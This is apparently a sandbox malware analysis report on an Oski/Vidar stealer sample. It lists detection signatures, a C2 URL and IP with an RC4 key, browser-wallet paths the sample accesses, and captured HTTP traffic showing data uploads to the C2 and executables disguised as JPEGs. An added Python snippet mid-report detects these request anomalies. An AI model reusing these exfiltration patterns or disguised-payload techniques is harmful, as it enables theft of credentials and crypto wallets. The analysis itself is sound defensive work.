Windows Analysis Report gunzipped.exe

Overview

General Information

Sample Name: gunzipped.exe
Analysis ID: 548641
MD5: c2301b62539adcba29dcf6a3200bd017
SHA1: fd80f7e8e32661d5ec12e7a901f22a9ed82e17a7
SHA256: c30ce79d7b5b0708dc03f1532fa89afd4efd732531cb557dc31fe63acd5bc1ce
Tags: exe, OskiStealer

Detection

Oski Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Oski Stealer
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Downloads files with wrong headers with respect to MIME Content-Type
Machine Learning detection for sample
Injects a PE file into a foreign process
Posts data to a JPG file (protocol mismatch)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locale information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file name differs from the original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses taskkill to terminate processes
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 0.2.gunzipped.exe.2cb0000.1.unpack Malware Configuration Extractor: Oski {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}
Source: 0.2.gunzipped.exe.2cb0000.1.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}
Multi AV Scanner detection for submitted file
Source: gunzipped.exe ReversingLabs: Detection: 53%
Machine Learning detection for sample
Source: gunzipped.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.gunzipped.exe.2cb0000.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.gunzipped.exe.7b0000.8.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.14.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.12.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.4.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.10.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.6.unpack Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.2.unpack Avira: Label: TR/AD.Chapak.dvwuj

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CCB10 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_007CCB10
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CC900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 1_2_007CC900
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CCBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_007CCBA0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CCD30 _malloc,_malloc,CryptUnprotectData, 1_2_007CCD30
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CEED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_007CEED0

Compliance:

Uses 32bit PE files
Source: gunzipped.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source: Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405C06 FindFirstFileA,FindClose, 0_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00402630 FindFirstFileA, 0_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00405C06 FindFirstFileA,FindClose, 1_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00402630 FindFirstFileA, 1_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 1_2_007B43DF
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 1_2_007D0540
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 1_2_007CE640
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 1_2_007CD360
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CF6B0 FindFirstFileExW, 1_2_007CF6B0
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 4x nop then add esp, 04h 1_2_007D3050

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49707 -> 2.56.57.108:80
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:27 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT ETag: "235d0-58a9fc6206c00" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT ETag: "9d9d8-5561b116cc500" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT ETag: "519d0-58a9fc2e87280" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT ETag: "217d0-58a9fc4382400" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:30 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:31 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg
Posts data to a JPG file (protocol mismatch)
Source: unknown HTTP traffic detected: POST /osk//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://2.56.57.108/osk/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GBTCLOUDUS GBTCLOUDUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /osk//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//1.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//2.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//3.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//4.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//5.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//7.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk//main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: POST /osk/ HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 87324 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache
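The requests above share the traits the report flags separately: no User-Agent header, a Host that is a bare IP literal (hence the TCP connections without a DNS query), POST to .jpg paths, a doubled slash where the configured base URL is joined to a file name, and a 25-byte multipart body that is nothing but the closing boundary (2d 2d ... 2d 2d 0d 0a is "--1BEF0A57BE110FD467A--" plus CRLF), so these POSTs upload nothing; only the final POST to /osk/ (Content-Length 87324) carries data. The Python below is an added example for this report, not Joe Sandbox code and not code from the sample; it parses constructed copies of these requests and emits one finding per anomaly. The request bytes are built from the headers quoted above; the upload body and the benign GET are hypothetical.

```python
"""Request-side anomaly checks for the POSTs quoted in the report.

Added example; not Joe Sandbox code and not code from the sample.
The request bytes are constructed from the headers the report shows.
"""
import ipaddress
import re
from dataclasses import dataclass

IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser, enough for captured traffic."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def is_empty_multipart(req: HttpRequest) -> bool:
    """True when a multipart/form-data body is only its closing boundary,
    i.e. the POST uploads nothing and is really a fetch or a beacon."""
    ctype = req.headers.get("content-type", "")
    if not ctype.startswith("multipart/form-data"):
        return False
    match = re.search(r"boundary=([^;\s]+)", ctype)
    if match is None:
        return False
    closing = b"--" + match.group(1).encode("latin-1") + b"--"
    return req.body.strip() == closing


def analyze(req: HttpRequest) -> list:
    """Return the anomaly strings that apply to one request."""
    findings = []
    if "user-agent" not in req.headers:
        findings.append("no User-Agent header")
    host = req.headers.get("host", "").rsplit(":", 1)[0]
    try:
        ipaddress.ip_address(host)  # raises ValueError for a hostname
        findings.append("Host is a bare IP literal (no DNS resolution)")
    except ValueError:
        pass
    if req.method == "POST" and req.path.lower().endswith(IMAGE_EXTENSIONS):
        findings.append("POST to an image path (protocol mismatch)")
    if is_empty_multipart(req):
        findings.append("empty multipart body (fetch or beacon, not an upload)")
    if "//" in req.path.lstrip("/"):
        findings.append("doubled slash in path (config base joined to file name)")
    return findings


# Constructed from the headers quoted in the report; body is exactly the
# 25 bytes the report shows (closing boundary + CRLF).
DEPENDENCY_FETCH = (
    b"POST /osk//6.jpg HTTP/1.1\r\n"
    b"Accept: text/html, application/xml;q=0.9, image/jpeg, */*;q=0.1\r\n"
    b"Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
    b"Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\n"
    b"Content-Length: 25\r\n"
    b"Host: 2.56.57.108\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"--1BEF0A57BE110FD467A--\r\n"
)

# Hypothetical upload to the panel root: headers as in the report's final
# POST, body a placeholder (the real one was 87324 bytes and is not shown).
EXFIL_POST = (
    b"POST /osk/ HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\n"
    b"Host: 2.56.57.108\r\n"
    b"\r\n"
    b"--1BEF0A57BE110FD467A\r\n"
    b'Content-Disposition: form-data; name="file"; filename="x.zip"\r\n'
    b"\r\n"
    b"PK\x03\x04 placeholder bytes\r\n"
    b"--1BEF0A57BE110FD467A--\r\n"
)

# Hypothetical benign browser request for comparison.
BENIGN_GET = (
    b"GET /images/logo.jpg HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, raw in [("dependency fetch", DEPENDENCY_FETCH),
                      ("upload to panel", EXFIL_POST),
                      ("benign browser GET", BENIGN_GET)]:
        print(name, "->", analyze(parse_request(raw)) or ["clean"])
```

The empty-multipart check is what separates the seven small POSTs (dependency fetches answered with PE files) from the one large POST that actually carries data; the other checks fire on all eight.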
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Jan 2022 06:57:27 GMTServer: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10Last-Modified: Thu, 06 Jun 2019 04:01:52 GMTETag: "235d0-58a9fc6206c00"Accept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
